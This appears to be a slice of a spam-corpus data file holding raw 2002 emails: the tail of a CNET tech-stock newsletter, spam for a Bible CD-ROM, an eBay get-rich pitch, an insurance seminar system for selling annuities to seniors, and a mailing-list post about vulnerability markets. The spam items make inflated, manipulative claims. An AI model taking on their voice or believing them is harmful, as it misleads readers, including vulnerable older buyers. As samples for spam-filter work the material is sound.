 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZG-Vz-PiCRYG8Y0gSPZxsR" &gt;EBSC&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;3.0&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#009933&gt;26.00%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech winners --&gt;
 &lt;br&gt;
 &lt;!-- tech losers --&gt;
 &lt;img src="http://www.cnet.com/i/nl/inv/rhc_lose.gif" width=160 height=20 alt="Tech Losers"&gt;&lt;br&gt;
 &lt;table width=160 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J2r6jzkOFkUMBXB6W5WWlR" &gt;NSIT&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;13.36&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-43.72%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMrKK45Pg5HSCN0U7nQUD4R" &gt;ITRI&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;14.82&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-32.79%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=b3-QHzxQYKF7rMd7i9AE64qDAwrPGrR" &gt;GZBX&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;2.28&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-25.49%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=c8-2lPnQWOIMbY36i8MKE-nFr99H2iR" &gt;TTEK&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;10.4&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-24.03%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt;&amp;nbsp;&lt;/td&gt;
 &lt;td nowrap height=20&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWMAbMglzxGZP85eXsJh-PR" &gt;GDYS&lt;/a&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;4.37&lt;/td&gt;
 &lt;td nowrap align=right&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;font color=#cc0000&gt;-23.20%&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /tech losers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href="http://clickthru.online.com/Click?q=f2-OZVTQUwPRrj3g_v0pvVdi5Z7ednR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjTZPy_0LEg3F-erCpGY9iR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQTqz5OQDKRl28NRQSnqQPR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQi8Bm39RKDFWVhZSgRXBnR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZx2oD9T3EOiJGu_NEsnEuR"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18,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href="http://clickthru.online.com/Click?q=5c-BnjPIZnWYPmQ58653xlZk0f-IosR" &gt;DJIA&lt;/a&gt;&lt;br&gt;8409.49 &amp;nbsp;&lt;font color=#cc0000&gt;-132.99&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZXeNnxzdgqwuBXvl3NU2FR" &gt;NASDAQ&lt;/a&gt;&lt;br&gt;1356.95 &amp;nbsp;&lt;font color=#cc0000&gt;-40.30&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJm04zepRSSjaeTldfVpf4R" &gt;S&amp;P 500&lt;/a&gt;&lt;br&gt;881.56 &amp;nbsp;&lt;font color=#cc0000&gt;-24.48&lt;/font&gt;&lt;/td&gt;
 &lt;td width="25%"&gt;&lt;img src="http://home.cnet.com/Images/Investor/arrow_down.gif" width="7" height="9" alt="" border="0" /&gt; &lt;font face="ms sans serif, geneva" size="-2"&gt;&lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIm1Af0z890dAVJ9PZAKTrR" &gt;CNET&amp;nbsp;TECH&lt;/a&gt;&lt;br&gt;982.84 &amp;nbsp;&lt;font color="#cc0000"&gt;&lt;font color=#cc0000&gt;-24.59&lt;/font&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=4&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;/td&gt;&lt;/tr&gt;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lose again with Seibel earnings miss, AOL questions&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Siebel Systems fell short of Wall Street's earnings expectations and offered a worse-than-expected outlook, helping to depress technology shares Thursday.
 &lt;p&gt;
 Despite a forecast from IBM in line with analyst expectations, investors seemed more focused on reports of a possible management shake-up at AOL Time Warner and on a Washington Post story questioning accounting methods at America Online. CNET's Tech index shed 24.59 points, or 2.45 percent, to close at 982.84. The tech-heavy Nasdaq composite index fell 40.30 points, or 2.88 percent, to close at 1,356.95.
 &lt;p&gt;
 Amid news The Conference Board's index of leading economic indicators held steady in June, broader markts also headed south. The Dow Jones industrials dropped 133.0 points, or 1.56 percent, to close at 8,409.4. The S&amp;P 500 slid 24.48 points, or 2.7 percent, to close at 881.56--another multi-year low.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href="http://clickthru.online.com/Click?q=b0-NZmfQQJQNJiYfWQdxQMKtNX8PQiR" &gt;AOL used unconventional business practices-Post &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 America Online Inc. boosted its revenue figures through unconventional deals from 2000 to 2002, before and after its acquisition of Time Warner Inc., the Washington Post reported on Thursday.
 A chart printed in conjunction with the Post article shows a total of $270.1 million in unconventional deals.&lt;br&gt;&lt;B&gt;AOL TIME WARNER INC 12.45 -5.03% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzO4TxlW3kazSROUJEymxqPR" &gt;IBM posts sharp drop in quarterly profits &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 International Business Machines Corp. on Wednesday said it eked out a second-quarter profit of just a few pennies a share as the world's largest computer maker took a $1.4 billion charge to exit money-losing businesses and cut jobs.
 But even without the big charge, earnings at IBM, which sells everything from computer software to microchips to computer services, fell sharply as corporations concerned about their own bottom lines cut back on technology spending.&lt;br&gt;&lt;B&gt;INTL BUSINESS MACHINES 72.05 1.92% &lt;/B&gt;
 &lt;p&gt;
 &lt;font size=3&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEJi8jgsNzvpmtTwxp6DtrR" &gt;Nokia sees slight rise in Q3 handset sales vs Q2 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Finnish telecom equipment maker Nokia said on Thursday it expected a slight rise in handset unit sales for both itself and the industry in the third quarter versus the April-June period.
 "it will be a reasonable quarter, but it will not represent such a dramatic growth as what might have been seen in some previous years," Chief Executive Jorma Ollila told a conference call following the firm's second-quarter result.&lt;br&gt;&lt;B&gt;NOKIA CORP ADS 13.33 -5.59%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href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyOnqul2fqfAgMcXeaiR"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href="http://clickthru.online.com/Click?q=05-gDULIG8PCtWW-BdfnODtxI8fiiPR" &gt;J.P. Morgan stays cautious toward Qwest in tech notes 7/18/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Marc Crossman repeats a "market performer" rating on the telecom firm and further lowers his estimates on what he sees as continued deterioration of Qwest's local and long-distance businesses. Crossman says Qwest could violate a bank agreement by the end of this quarter if it doesn't close a significant asset sale. And he argues the firm faces a funding shortage next year that can't be satisfied by selling its eastern directories businesses alone.&lt;br&gt;&lt;B&gt;QWEST COMMUNICATIONS INTL INC 2.74 14.64% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXxiCA1b-Bd5q0_HZB17WnR"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href="http://clickthru.online.com/Click?q=30-u8NEIRrPLw7JzzY8IeOdSKzjX1iR" &gt;Dell: PC Market Slow and May Stay So &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The stumbling economy continues to dampen demand for personal computers and could do so for the rest of the year, Dell Computer Corp. Chief Operating Officer Kevin Rollins said on Thursday.
 Despite the slow market, No. 2 computer maker Dell is gaining market share, partly because of the recent merger of Hewlett Packard Co. and Compaq Computer Corp., Rollins told reporters after Dell's annual shareholder meeting here.&lt;br&gt;&lt;B&gt;DELL COMPUTER CORP 26.0500 -1.10% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij62HZVL-EDvznhjonlZR"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href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKyrJDQ24YOLpk6Td6dR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3Y3z7Pua3RXvLF34ULXuR"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href="http://clickthru.online.com/Click?q=84-CCOyQ60FV7xU37MZsihsBSWgp7yR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdF8qi85N02H3f2jvrqULlR"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href="http://clickthru.online.com/Click?q=ae-jOE6QMB2ESr12aN8-mhe2RYEVu4R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLHNfhWEEfZ5znP-FdWuurR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLPzz2hzgimkSWreAgRDciR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgV7qkheZ0rxv3orMjEsaQPR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxKPmwuhKQcaLlAI6OrR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phLhwGpTiMEyR1N675iR"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href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNlNmhu-VdngyV7VDjSPR"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href="http://clickthru.online.com/Click?q=42-rF7cIPKGJA7DQNLpz3F7_4EMIrdR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII0aTAWe6tAF0F_wt9Q9dZuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@spamassassin.taint.org&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=6c-SUY3zFPa8Qg_jwbWrwYtNHsgW9Z1xdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KpQsgTuo1pqfRO9R6BpKlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtdhd9NZkmejZWSoS2P4Jm4R"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href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8yuZwndWfGJ0kSyVjyR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4rGTXjwiOPYOLipujlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6xh43PnOIRzw0LGkk4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhOe_rndo6MzbuNK5xrR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QDB2T7LN9bgi4cHr7W6TiR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGcDl2JcJtfAV-hDEc2lRbPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=2b-2FwYnHzypG1DIkSuISVhpWZYQ9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOUR BIBLE ANSWERS ON CD-ROM ..4658
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Dear Friend:
 Find solutions to all your daily problems and life's challenges at the click of a mouse button?
 We have the answers you're looking for on The Word Bible CD-ROM it is one of the most powerful, life-changing tools available today and it's easy to use.
 On one CD, (Windows or Macintosh versions) you have a complete library of Bibles, well known reference books and study tools. You can view several Bible versions simultaneously, make personal notes, print scriptures and search by word, phrase or topic.
 The Word Bible CD offers are simply amazing.
 The wide range of resources on the CD are valued at over $1,500 if purchased separately.
 ** 14 English Bible Versions
 ** 32 Foreign Language Versions
 ** 9 Original Language Versions
 ** Homeschool Resource Index
 ** 17 Notes &amp; Commentaries
 ** Colorful Maps, Illustrations, &amp; Graphs
 ** Step-by-Step Tutorial
 ** Fast &amp; Powerful Word/Phrase Search
 ** More than 660,000 cross references
 ** Complete Manual With Index
 Also:
 ** Build a strong foundation for dynamic Bible Study,
 ** Make personal notes directly into your computer,
 ** Create links to favorite scriptures and books.
 Try it. No Risk. 30-day money-back guarantee
 [excluding shipping &amp; handling]
 If you are interested in complete information on The Word CD, please visit our
 Web site: http://bible.8mail.net/
 US and International orders accepted. Credit cards and personal checks accepted.
 If your browser won't load the Web site please click the link below to send us an e-mail and we will provide you more information.
 mailto:cd-bible@minister.com?subject=Please-email-Bible-info    
 Your relationship with God is the foundation of your life -- on earth and for eternity. It's the most important relationship you'll ever enjoy. Build your relationship with God so you can reap the life-changing benefits only He can provide: unconditional love; eternal life; financial and emotional strength; health; and solutions to every problem or challenge you'll ever face.
 May God Bless You,
 GGII Ministries, 160 White Pines Dr., Alpharetta Ga, 30004
 E-mail address:CD-bible@minister.com  
 Phone:  770-343-9724  Fax 770-772-9925
 ******************************************
 We apologize if you are not interested in being on our Bible News e-mail list. The Internet is the fastest method of distributing this type of timely information. If you wish to have your e-mail address deleted from our Bible News e-mail database, DO NOT USE THE REPLY BUTTON. THE FROM ADDRESS DOES NOT GO TO OUR REMOVE DATABASE. Simply click here to send an e-mail that will remove your address from the database: mailto:rm8952@post.com?subject=offlist     
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make Huge Profits on eBay                          951
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; 
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF"&gt;
 &lt;table width=3D"58%" height=3D"257"&gt;
   &lt;tr valign=3D"top"&gt; 
     &lt;td height=3D"253"&gt; 
       &lt;p&gt;&lt;font size=3D"3"&gt;&lt;b&gt;Fortunes are literally being made in this new=
  marketplace.&lt;/b&gt;&lt;/font&gt; 
       &lt;/p&gt;
       &lt;p&gt;O&lt;font size=3D"3"&gt;&lt;/font&gt;&lt;font size=3D"3"&gt;ver &lt;b&gt;$9 Billion&lt;/b&gt; i=
 n merchandise 
         was sold on &lt;b&gt;eBay&lt;/b&gt; in 2001 by people just like you - &lt;u&gt;right=
  from 
         their homes&lt;/u&gt;! &lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size=3D"3"&gt;Now you too can learn the secrets of &lt;b&gt;successf=
 ul selling 
         &lt;/b&gt;on&lt;b&gt; eBay&lt;/b&gt; and &lt;b&gt;make a staggering income&lt;/b&gt; from the co=
 mfort 
         of &lt;b&gt;your own home&lt;/b&gt;. If you are &lt;b&gt;motivated&lt;/b&gt;, capable of h=
 aving 
         an&lt;b&gt; open mind&lt;/b&gt;, and can follow simple directions, then &lt;a hre=
 f=3D"http://www.nationalbizcorp.com/ebooks"&gt;visit 
         us here&lt;/a&gt;. If server busy - &lt;a href=3D"http://www.generaledu.com=
 /ebooks"&gt;alternate.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font size=3D"2"&gt;You received this offer as a result of an affili=
 ate relationship 
         with one of our marketing partners. If you are not interested in f=
 uture 
         offers &lt;a href=3D"http://www.nationalbizcorp.com/remove.html"&gt;go h=
 ere.&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
       &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp; &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: the underground software vulnerability marketplace and its hazards
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 22 Aug 2002, Kragen Sitaker wrote:
 --]If this kind of secret traffic is allowed to continue, it will pose a
 --]very serious threat to our computer communications infrastructure.
 The goverment mindset is now, If you know a vulnerability and let it on to
 anyone BUT the manufacturer you are a criminal...end of story, go directly
 to jail do not collect 200$ and tip a hat to the citizen infromants who
 helped get you there.
 So this leaves lucrative contracts for those who find and then NDA the
 find with the manufacturer with, if the finder is smart, an imunity from
 any prosecution in the future so long as the NDA is kept.
 Oh my droogie, those who are in the shirt hairs hanging of the new age
 employemnt market, this could be your golden molden moment to strike the
 new gold mine...and perhaps coopt it fromthe start.....
 There are two ways to fight the powers that be, from with out and from
 with in...lets not turn a blind eye towards one becuase someone, yes
 someone, will do the deed and if that someone does not have the "make em
 weak for the revultion to come" mindset then we are all and truly doomed.
 Fight without
 Fight within
 and make some scratch on the differences between:)-
 -tomwsmf
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Behind Every Elite Producer...
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_2505E5_01C254FA.FC480250
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Behind every elite producer...is an elite seminar system!=09
  	 =09
  =09
  =09
  Attention all independent registered representatives:
  Our reps' business has grown dramatically in the last two years.
  What's their hook?
  Our exclusive seminar marketing system for seniors, combined with
 equity indexed and fixed annuities.=09
  	Advanced equity indexed annuities and how registered reps
 position these products in their practice. (The EIA story is out =97 =
 with
 8 years of great results).	=20
  	Proven seminar marketing system (Hundreds of our reps are using
 this system to build their senior client base).	=20
  	A simpler approach to increasing sales with our generic
 PowerPoint=AE EIA presentation, and "Should I Stay or Should I Go,"
 Incomizer and Inflationizer sales ideas.	=20
  	Real world scenarios that you can use to solve real world
 problems in today's environment.	=20
  The bottom line:=0A=
 Your senior clients and prospects want you to call us
 today.
  =09
 Call us today for more information!
  800-880-3072
 - or -
 Please fill out the form below for more information	=20
 Name:	 	  =09
 E-mail:	 	=20
 Phone:	 	=20
 City:	 	 State:	 	=20
  	    =09
 =20
  American Financial Marketing, Inc.
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_2505E5_01C254FA.FC480250
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Behind Every Elite Producer...&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/amfin/20020823-2.gif" =
 alt=3D"Behind every elite producer...is an elite seminar system!" =
 width=3D"550" height=3D"134"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td rowspan=3D"3" width=3D"375"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-101.jpg" width=3D"375" =
 height=3D"270"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-102.gif" width=3D"175" =
 height=3D"49"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-103.jpg" width=3D"175" =
 height=3D"169"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-104.gif" width=3D"175" =
 height=3D"52"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
 						&lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"center"&gt; &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-301.gif" alt=3D"Attention all =
 independent registered representatives:" width=3D"540" =
 height=3D"36"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-302.gif" alt=3D"Our reps' =
 business has grown dramatically in the last two years." width=3D"540" =
 height=3D"26"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-303.gif" alt=3D"What's their =
 hook?" width=3D"540" height=3D"63"&gt;&lt;br&gt;
                   &lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-304.gif" alt=3D"Our exclusive =
 seminar marketing system for seniors, combined with equity indexed and =
 fixed annuities." width=3D"540" height=3D"53"&gt;=20
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td align=3D"center"&gt;=20
                   &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"4%" valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-4.gif" width=3D"16" =
 height=3D"16"&gt;&lt;/td&gt;
                       &lt;td&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Advanced equity indexed =
 annuities&lt;/b&gt;=20
                         and how registered reps position these products =
 in their=20
                         practice. (The EIA story is out &amp;#8212; with 8 =
 years of=20
                         great results).&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-4.gif" width=3D"16" =
 height=3D"16"&gt;&lt;/td&gt;
                       &lt;td&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Proven seminar marketing =
 system &lt;/b&gt;(Hundreds=20
                         of our reps are using this system to build their =
 senior=20
                         client base).&lt;/font&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td valign=3D"top"&gt;&lt;img =
 src=3D"http://iiq.us/images/amfin/20020823-4.gif" width=3D"16" =
 height=3D"16"&gt;&lt;/td&gt;
                       &lt;td&gt;&lt;font size=3D"2"&gt;&lt;b&gt;A simpler approach to =
